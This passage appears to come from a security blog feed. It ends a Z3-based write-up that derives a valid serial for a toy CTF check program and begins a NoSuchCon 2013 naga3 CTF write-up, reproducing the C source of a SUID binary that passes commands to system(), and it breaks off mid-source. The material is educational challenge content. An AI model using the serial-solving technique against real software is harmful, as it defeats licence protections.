#ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s8</span><span style="color: #81A1C1;"> +</span><span> s13</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 14</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s18</span><span style="color: #81A1C1;"> *</span><span> s8</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 5</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s4</span><span style="color: #81A1C1;"> *</span><span> s11</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s8</span><span style="color: #81A1C1;"> +</span><span> s9</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 12</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s12</span><span style="color: #81A1C1;"> -</span><span> s19</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s9</span><span style="color: #81A1C1;"> %</span><span> s17</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 7</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s14</span><span style="color: #81A1C1;"> *</span><span> s16</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 40</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s7</span><span style="color: #81A1C1;"> -</span><span> s4</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s6</span><span style="color: #81A1C1;"> +</span><span> s0</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 6</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s2</span><span style="color: #81A1C1;"> -</span><span> s16</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s4</span><span style="color: #81A1C1;"> -</span><span> s6</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s0</span><span style="color: #81A1C1;"> %</span><span> s5</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 4</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s5</span><span style="color: #81A1C1;"> *</span><span> s11</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s10</span><span style="color: #81A1C1;"> %</span><span> s15</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 2</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s11</span><span style="color: #81A1C1;"> /</span><span> s3</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s14</span><span style="color: #81A1C1;"> -</span><span> s13</span><span style="color: #81A1C1;"> == -</span><span style="color: #B48EAD;">4</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s18</span><span style="color: #81A1C1;"> +</span><span> s19</span><span style="color: #81A1C1;"> ==</span><span style="color: #B48EAD;"> 3</span><span style="color: #ECEFF4;">)</span></span></code></pre> <p>We add a condition to make <code>s[3]</code> different than zero because one of the conditions divides by it, Z3 will accept 0 as a valid value but Python will throw an exception. Finally we call <code>solver.check()</code> which will determine if the solver is able to meet the conditions and <code>solver.model()</code> which will return a set of values that meet those conditions.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="python"><span class="giallo-l"><span style="color: #616E88;"># s3 can&#39;t be 0 because of division by zero</span></span> <span class="giallo-l"><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">add</span><span style="color: #ECEFF4;">(</span><span>s3</span><span style="color: #81A1C1;"> !=</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">)</span></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">solving...</span><span style="color: #ECEFF4;">&quot;)</span></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;">(</span><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">check</span><span style="color: #ECEFF4;">())</span></span> <span class="giallo-l"><span style="color: #88C0D0;">print</span><span style="color: #ECEFF4;">(</span><span>solver</span><span style="color: #ECEFF4;">.</span><span style="color: #88C0D0;">model</span><span style="color: #ECEFF4;">())</span></span></code></pre><pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>&gt;python break_serial.py</span></span> <span class="giallo-l"><span>solving...</span></span> <span class="giallo-l"><span>sat</span></span> <span class="giallo-l"><span>[s[8] = 5,</span></span> <span class="giallo-l"><span> s[4] = 3,</span></span> <span class="giallo-l"><span> s[19] = 2,</span></span> <span class="giallo-l"><span> s[17] = 8,</span></span> <span class="giallo-l"><span> s[16] = 8,</span></span> <span class="giallo-l"><span> s[2] = 8,</span></span> <span class="giallo-l"><span> s[9] = 7,</span></span> <span class="giallo-l"><span> s[1] = 2,</span></span> <span class="giallo-l"><span> s[3] = 1,</span></span> <span class="giallo-l"><span> s[15] = 7,</span></span> <span class="giallo-l"><span> s[11] = 0,</span></span> <span class="giallo-l"><span> s[10] = 9,</span></span> <span class="giallo-l"><span> s[12] = 3,</span></span> <span class="giallo-l"><span> s[18] = 1,</span></span> <span class="giallo-l"><span> s[0] = 4,</span></span> <span class="giallo-l"><span> s[14] = 5,</span></span> <span class="giallo-l"><span> s[7] = 4,</span></span> <span class="giallo-l"><span> s[6] = 2,</span></span> <span class="giallo-l"><span> s[5] = 7,</span></span> <span class="giallo-l"><span> s[13] = 9]</span></span></code></pre> <p>Again with a bit of search/replace and some python we can get our serial.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>&gt;&gt;&gt; s = [0] * 20</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[8] = 5</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[4] = 3</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[19] = 2</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[17] = 8</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[16] = 8</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[2] = 8</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[9] = 7</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[1] = 2</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[3] = 1</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[15] = 7</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[11] = 0</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[10] = 9</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[12] = 3</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[18] = 1</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[0] = 4</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[14] = 5</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[7] = 4</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[6] = 2</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[5] = 7</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; s[13] = 9</span></span> <span class="giallo-l"><span>&gt;&gt;&gt; &quot;&quot;.join([str(x) for x in s])</span></span> <span class="giallo-l"><span>&#39;42813724579039578812&#39;</span></span></code></pre> <p>We validate that our key is accepted :</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>&gt; python harder_serial.py 42813724579039578812</span></span> <span class="giallo-l"><span>Please enter a valid serial number from your RoboCorpIntergalactic purchase</span></span> <span class="giallo-l"><span>#&gt;42813724579039578812&lt;#</span></span> <span class="giallo-l"><span>Thank you! Your product has been verified!</span></span></code></pre> <p>This was a rather simple use of Z3, for examples of advanced use of Z3 for reverse engineering see the following articles:</p> <p><a rel="nofollow noreferrer external" href="http://doar-e.github.io/blog/2013/09/16/breaking-kryptonites-obfuscation-with-symbolic-execution/">Breaking Kryptonite's Obfuscation: A Static Analysis Approach Relying on Symbolic Execution</a> by Axel Souchet</p> <p><a rel="nofollow noreferrer external" href="http://shell-storm.org/blog/Concolic-execution-taint-analysis-with-valgrind-and-constraints-path-solver-with-z3/">Concolic execution - Taint analysis with Valgrind and constraints path solver with Z3</a> by Jonathan Salwan.</p> 2013-06-19T00:00:00+00:00 2013-06-19T00:00:00+00:00 https://ekse.github.io/blog/naga3-writeup/ <p>This is a writeup for the naga3 challenge that was part of the NoSuchCon 2013 CTF. I picked this challenge for the <a rel="nofollow noreferrer external" href="http://montrehack.ca/">Montrehack</a> session I was hosting this month as I found it quite interesting and a bit different than the challenges I did in the past. Montrehack is an informal group that gathers every month to practice CTF challenges and the solution is presented at the end; if you live in the Montreal area feel free to drop by, it's a lot of fun and a great way to learn. For the purpose of this article I will use the challenge environment I recreated for the event, the paths are different than on the CTF server but I used the original binary.</p> <p>The challenges are accessible at <a rel="nofollow noreferrer external" href="https://overthewire.org/wargames/kishi/">OverTheWire</a> so if you want to try it by yourself first you should stop reading now.</p> <p>The original description of the challenge was <em>"To monitor local system performance, a tool was developed to take some timing measurements by executing some commands"</em>. The first step was to find the binary. Searching for files owned by naga3 shows a program called rtv. rtv is SUID on user naga3. (To simplify things, I put the program and source code directly in /home/level2/ on my VM for Montrehack).</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="plain"><span class="giallo-l"><span>naga2@naga:/$ find . -user naga3</span></span> <span class="giallo-l"><span>./usr/lib/rtv.c</span></span> <span class="giallo-l"><span>./usr/lib/rtv</span></span></code></pre> <p>We now have access to the binary and the source code of the program. As rtv.c is actually quite short, I reproduce it here.</p> <pre class="giallo" style="color: #D8DEE9; background-color: #2E3440;"><code data-lang="c"><span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">include</span><span style="color: #ECEFF4;"> &lt;</span><span style="color: #8FBCBB;">stdio.h</span><span style="color: #ECEFF4;">&gt;</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">include</span><span style="color: #ECEFF4;"> &lt;</span><span style="color: #8FBCBB;">stdlib.h</span><span style="color: #ECEFF4;">&gt;</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">define</span><span style="color: #88C0D0;"> _GNU_SOURCE</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">include</span><span style="color: #ECEFF4;"> &lt;</span><span style="color: #8FBCBB;">unistd.h</span><span style="color: #ECEFF4;">&gt;</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">include</span><span style="color: #ECEFF4;"> &lt;</span><span style="color: #8FBCBB;">sys/prctl.h</span><span style="color: #ECEFF4;">&gt;</span></span> <span class="giallo-l"><span style="color: #81A1C1;">struct</span><span style="color: #8FBCBB;"> measurement_t</span><span style="color: #ECEFF4;"> {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> char</span><span> command</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">128</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> unsigned long long</span><span> runtime</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span><span> Measurements</span><span style="color: #81A1C1;">[] =</span><span style="color: #ECEFF4;"> {</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {&quot;</span><span style="color: #A3BE8C;">sleep 1</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">L</span><span style="color: #ECEFF4;">},</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {&quot;</span><span style="color: #A3BE8C;">env</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">L</span><span style="color: #ECEFF4;">},</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {&quot;</span><span style="color: #A3BE8C;">md5sum /etc/passwd</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">L</span><span style="color: #ECEFF4;">},</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {&quot;</span><span style="color: #A3BE8C;">ls -l /etc/passwd</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">L</span><span style="color: #ECEFF4;">},</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> {&quot;</span><span style="color: #A3BE8C;">dd if=/dev/zero of=/dev/null bs=1M count=100</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">L</span><span style="color: #ECEFF4;">},</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #5E81AC;font-weight: bold;">#</span><span style="color: #81A1C1;">define</span><span style="color: #88C0D0;"> MEASUREMENTCOUNT</span><span style="color: #ECEFF4;"> (</span><span style="color: #81A1C1;">sizeof</span><span style="color: #ECEFF4;">(</span><span style="color: #5E81AC;">Measurements</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> / sizeof</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">struct</span><span style="color: #8FBCBB;"> measurement_t</span><span style="color: #ECEFF4;">))</span></span> <span class="giallo-l"><span style="color: #81A1C1;">int</span><span> measurementCount </span><span style="color: #81A1C1;">=</span><span> MEASUREMENTCOUNT</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;">void</span><span style="color: #88C0D0;"> report_measurements</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">int</span><span> s</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> i</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span style="color: #ECEFF4;">(</span><span>i </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> i </span><span style="color: #81A1C1;">&lt;</span><span> measurementCount</span><span style="color: #81A1C1;">;</span><span> i</span><span style="color: #81A1C1;">++</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #616E88;"> //printf(&quot;Reporting command %d\n&quot;, i);</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> write</span><span style="color: #ECEFF4;">(</span><span>s</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> &amp;</span><span>i</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>i</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> write</span><span style="color: #ECEFF4;">(</span><span>s</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> &amp;</span><span style="color: #ECEFF4;">(</span><span>Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>runtime</span><span style="color: #ECEFF4;">),</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">unsigned long long</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span> <span class="giallo-l"><span style="color: #81A1C1;">void</span><span style="color: #88C0D0;"> make_measurements</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">int</span><span> s</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> struct</span><span> timeval pre</span><span style="color: #ECEFF4;">,</span><span> post</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> i</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> char</span><span> cmd</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">256</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span style="color: #ECEFF4;">(</span><span>i </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> i </span><span style="color: #81A1C1;">&lt;</span><span> measurementCount</span><span style="color: #81A1C1;">;</span><span> i</span><span style="color: #81A1C1;">++</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> gettimeofday</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">&amp;</span><span>pre</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> NULL</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> sprintf</span><span style="color: #ECEFF4;">(</span><span>cmd</span><span style="color: #ECEFF4;">, &quot;</span><span style="color: #A3BE8C;">PARENTPID=%d %s &gt; /dev/null 2&gt; /dev/null</span><span style="color: #ECEFF4;">&quot;,</span><span style="color: #88C0D0;"> getpid</span><span style="color: #ECEFF4;">(),</span><span> Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>command</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> system</span><span style="color: #ECEFF4;">(</span><span>cmd</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> gettimeofday</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">&amp;</span><span>post</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> NULL</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span> Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>runtime</span><span style="color: #81A1C1;"> =</span><span style="color: #ECEFF4;"> (</span><span>post</span><span style="color: #ECEFF4;">.</span><span>tv_sec</span><span style="color: #81A1C1;"> -</span><span> pre</span><span style="color: #ECEFF4;">.</span><span>tv_sec</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> *</span><span style="color: #B48EAD;"> 1000000</span><span style="color: #81A1C1;"> +</span><span> post</span><span style="color: #ECEFF4;">.</span><span>tv_usec</span><span style="color: #81A1C1;"> -</span><span> pre</span><span style="color: #ECEFF4;">.</span><span>tv_usec</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span> <span class="giallo-l"><span style="color: #81A1C1;">void</span><span style="color: #88C0D0;"> print_measurements</span><span style="color: #ECEFF4;">() {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> i</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> for</span><span style="color: #ECEFF4;">(</span><span>i </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span><span> i </span><span style="color: #81A1C1;">&lt;</span><span> measurementCount</span><span style="color: #81A1C1;">;</span><span> i</span><span style="color: #81A1C1;">++</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> printf</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Command[%d] </span><span style="color: #EBCB8B;">\&quot;</span><span style="color: #A3BE8C;">%s</span><span style="color: #EBCB8B;">\&quot;</span><span style="color: #A3BE8C;"> executed in %llu</span><span style="color: #ECEFF4;">&quot;&quot;</span><span style="color: #A3BE8C;">us</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;,</span><span> i</span><span style="color: #ECEFF4;">,</span><span> Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>command</span><span style="color: #ECEFF4;">,</span><span> Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>runtime</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span> <span class="giallo-l"><span style="color: #81A1C1;">void</span><span style="color: #88C0D0;"> read_measurements</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">int</span><span> s</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> i </span><span style="color: #81A1C1;">=</span><span style="color: #B48EAD;"> 0</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> unsigned long long</span><span> t</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> rc</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> while</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #ECEFF4;">((</span><span>rc </span><span style="color: #81A1C1;">=</span><span style="color: #88C0D0;"> read</span><span style="color: #ECEFF4;">(</span><span>s</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> &amp;</span><span>i</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>i</span><span style="color: #ECEFF4;">)))</span><span style="color: #81A1C1;"> &lt; sizeof</span><span style="color: #ECEFF4;">(</span><span>i</span><span style="color: #ECEFF4;">)) {</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> printf</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Truncated read: %d instead of %d</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;,</span><span> rc</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>i</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> exit</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #ECEFF4;">((</span><span>rc </span><span style="color: #81A1C1;">=</span><span style="color: #88C0D0;"> read</span><span style="color: #ECEFF4;">(</span><span>s</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> &amp;</span><span>t</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>t</span><span style="color: #ECEFF4;">)))</span><span style="color: #81A1C1;"> &lt; sizeof</span><span style="color: #ECEFF4;">(</span><span>t</span><span style="color: #ECEFF4;">)) {</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> printf</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">Truncated read: %d instead of %d</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;,</span><span> rc</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> sizeof</span><span style="color: #ECEFF4;">(</span><span>t</span><span style="color: #ECEFF4;">))</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> exit</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #616E88;"> //printf(&quot;Measurement %d read: %llu\n&quot;, i, t);</span></span> <span class="giallo-l"><span> Measurements</span><span style="color: #ECEFF4;">[</span><span>i</span><span style="color: #ECEFF4;">].</span><span>runtime</span><span style="color: #81A1C1;"> =</span><span> t</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #ECEFF4;">(</span><span>i </span><span style="color: #81A1C1;">==</span><span> measurementCount </span><span style="color: #81A1C1;">-</span><span style="color: #B48EAD;"> 1</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> return;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #ECEFF4;">}</span></span> <span class="giallo-l"><span style="color: #81A1C1;">int</span><span style="color: #88C0D0;"> main</span><span style="color: #ECEFF4;">(</span><span style="color: #81A1C1;">int</span><span> argc</span><span style="color: #ECEFF4;">,</span><span style="color: #81A1C1;"> char *</span><span>argv</span><span style="color: #81A1C1;">[]</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> int</span><span> p</span><span style="color: #ECEFF4;">[</span><span style="color: #B48EAD;">2</span><span style="color: #ECEFF4;">]</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> if</span><span style="color: #ECEFF4;">(</span><span style="color: #88C0D0;">pipe</span><span style="color: #ECEFF4;">(</span><span>p</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;"> &lt;</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">) {</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> fprintf</span><span style="color: #ECEFF4;">(</span><span>stderr</span><span style="color: #ECEFF4;">, &quot;</span><span style="color: #A3BE8C;">Pipe Failed.</span><span style="color: #EBCB8B;">\n</span><span style="color: #ECEFF4;">&quot;)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> exit</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #ECEFF4;"> }</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> switch</span><span style="color: #ECEFF4;"> (</span><span style="color: #88C0D0;">fork</span><span style="color: #ECEFF4;">()) {</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> case -</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> perror</span><span style="color: #ECEFF4;">(&quot;</span><span style="color: #A3BE8C;">main: fork</span><span style="color: #ECEFF4;">&quot;)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #88C0D0;"> exit</span><span style="color: #ECEFF4;">(</span><span style="color: #B48EAD;">1</span><span style="color: #ECEFF4;">)</span><span style="color: #81A1C1;">;</span></span> <span class="giallo-l"><span style="color: #81A1C1;"> case</span><span style="color: #B48EAD;"> 0</span><span style="color: #ECEFF4;">:</span></span> <span class="giallo-l"><span 